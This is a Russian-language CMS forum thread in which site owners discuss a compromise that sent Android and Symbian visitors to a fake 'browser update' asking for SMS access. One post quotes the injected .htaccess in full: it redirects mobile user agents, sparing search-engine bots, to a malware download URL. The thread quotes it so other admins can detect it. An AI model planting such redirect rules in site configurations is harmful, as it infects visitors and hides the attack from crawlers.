Найти на сайте
  2. Форумы
  3. РАЗНОЕ
  4. Флейм / Флуд / Оффтопик
  5. Внимание! Нехорошая ссылка

Внимание! Нехорошая ссылка

#1 30 марта 2013 в 02:57
Здравствуйте уважаемые разработчики iCMS и все кто использует эту CMS. Обнаружил взлом, а так же вставлена ссылка
h..p://o230.com
которая проявляется только на андроиде. Просит-вынуждает обновить браузер, доступ к СМС и ММС и тд… Будте внимательны. Данный домен (домен зареган, пару недель назад) появился недавно -после установки некоторых модулей… Думаю стоит применить санкции.
0
#2 30 марта 2013 в 03:03

Просит-вынуждает обновить браузер, доступ к СМС и ММС и тд...

Tagil-Rulit
в такие моменты я рад, что у меня на планшете нету симок v
правда без вайфая и инета нет cry
0
#3 30 марта 2013 в 03:04

-после установки некоторых модулей...

А конкретнее?
0
#4 30 марта 2013 в 03:08

iCMS и все кто использует эту CMS.

Tagil-Rulit
Хотелось бы знать какая версия движка, какие модули ставили?..
0
#5 30 марта 2013 в 03:17
ссылка на статью, где описаны подобные случаи
h..p://habrahabr.ru/post/83062/
. Хостер тот же, что и в данном случае.

Хотелось бы знать какая версия движка, какие модули ставили?...

malanas

Ставил 3 платных модуля и один бесплатный-(мероприятия)
0
#6 30 марта 2013 в 04:42

ссылка на статью, где описаны подобные случаи

Tagil-Rulit
4 февраля 2010 в 09:37
shock
Tagil-Rulit, подобные случаи были, есть и будут!) причем та "древняя" статья к вашему случаю?
Или пароли сперли, или через дополнения возможно шаблон...

Больше кипаша чем толкового пояснения какая версия двига, что за шаб и какие дополнения… возможно просто пароли сперты)
0
#7 30 марта 2013 в 10:24
Вот зачем пугать то? Пока на статью не перешел аж изнервничался весь laugh
Компонент тизерной рекламы "AdClicks" доступен для скачивания
0
#8 30 марта 2013 в 13:45

Больше кипаша чем толкового пояснения какая версия двига, что за шаб и какие дополнения… возможно просто пароли сперты)

reload
Были случаи, когда секунды-минуты решали всё.
Ни кого не обвинял, лишь предупредил- и инфы по модулям не выкладывал специально-пока не проверил информацию. Написал лишь ссылку жуликов и статья на методы обмана в харбаре… Ищу где гадость прописалась. Данные по хосту мошенников можно взять через статистику.
Пароли в моём случае спереть хлопотно. Все понимаем, что увести могут всегда-тут вопрос только в — стоит ли овчина выделки… потраченное время и ресурсы на то, что бы спереть…
Ссылка на сайте вероятно в зашифрованном виде… перерыл файлы все… в БД пока не лез.

П.С. Возможно ломанули самого хостера…
0
#9 30 марта 2013 в 13:49
так и в чем же дело ?
есть ли у кого ссылки на онлайн эмулятор под андроид?
0
#10 30 марта 2013 в 14:15 
  1. AddDefaultCharset utf-8
  2. Options -Indexes
  3.  
  4. RewriteEngine On
  5. RewriteBase /
  6. RewriteRule ^.htaccess$ - [F]
  7.  
  8. RewriteCond %{REQUEST_URI} !\.(ico|css|js|txt)$ [NC]
  9. RewriteCond %{REQUEST_FILENAME} !^/admin
  10. RewriteCond %{REQUEST_FILENAME} !^/migrate
  11. RewriteCond %{REQUEST_FILENAME} !^/install
  12. RewriteCond %{REQUEST_FILENAME} !-f
  13. RewriteCond %{REQUEST_FILENAME} !-d
  14.  
  15. RewriteRule ^(.*)$ /index.php [L]
  16.  
  17. RewriteEngine   on
  18. RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]
  19. RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
  20. RewriteRule    (.*)    h..p://o230.com/browser_update/1793/browser_update.auto    [L,R=302]
Взломали самого хостера, на сотнях сайтов была подмена файла .htaccess Выше под спойлером привёл код подмены. Хостер просил не разглашать инфу и своих данных…
0
#12 30 марта 2013 в 16:29

Так куда всем бежать?

йО ыХ Зу

Взломали самого хостера, на сотнях сайтов была подмена файла .htaccess Выше под спойлером привёл код подмены.

Tagil-Rulit

Стоит проверить, как отображается Ваш сайт с телефона, планшетника и тд… данный код заточен под разные ОСи, но чётко рабтал только на симбиан и андроиде.
0
#13 30 марта 2013 в 20:00

Стоит проверить, как отображается Ваш сайт с телефона, планшетника и тд…

Tagil-Rulit
я могу

у меня на планшете нету симок

nedoriko
мне это не страшно

Просит-вынуждает обновить браузер, доступ к СМС и ММС и тд

Tagil-Rulit
0
#14 30 марта 2013 в 22:50
У меня такое было. Хостинг не суперский, поэтому не боюсь назвать 1gb.ru. Не знаю насколько это связано с хостером. Нашел эту беду айболитом
Мой первый проект которым я занимаюсь больше месяца ))) http://in-army.com/
0
#15 31 марта 2013 в 18:28

nedoriko:
у меня на планшете нету симок
мне это не страшно

nedoriko
Посетителям Вашего сайта страшно… Для посетителей, виноваты (часто) всегда админы сайта… недосмотрели, не проконтролировали и тд.
0
Несколько фотографий в объявле
Опять размер миниатюр
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.

Похожие темы

Видео по ссылке и импорт из вконтакте в instantvideo2

Форум Создана 8 месяцев назад 2 сообщения

Ссылки на категории и их влияние на продвижение сайта в регионах

SEO & PR Создана 4 года назад 17 сообщений

[ЕСТЬ РЕШЕНИЕ] Вывод ссылки на скачивание файла в шаблоне дополнения

Разработка дополнений Создана 4 года назад 6 сообщений

ссылка для приглашения

HTML / CSS / PHP / JS / RegExp Создана 4 года назад 3 сообщения

Ссылка "позвонить " в пункте меню

Дизайн / Графика / Искусство Создана 3 года назад 9 сообщений

Ссылки в заголовках виджетов

Инновации в системе Создана 3 года назад 3 сообщения

InstantCMS Team

Связь с нами
Email dev@instantcms.ru

Делаем полезные Интернет проекты с 2008 года 💫

О проекте

Поддержка

Дополнения

Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.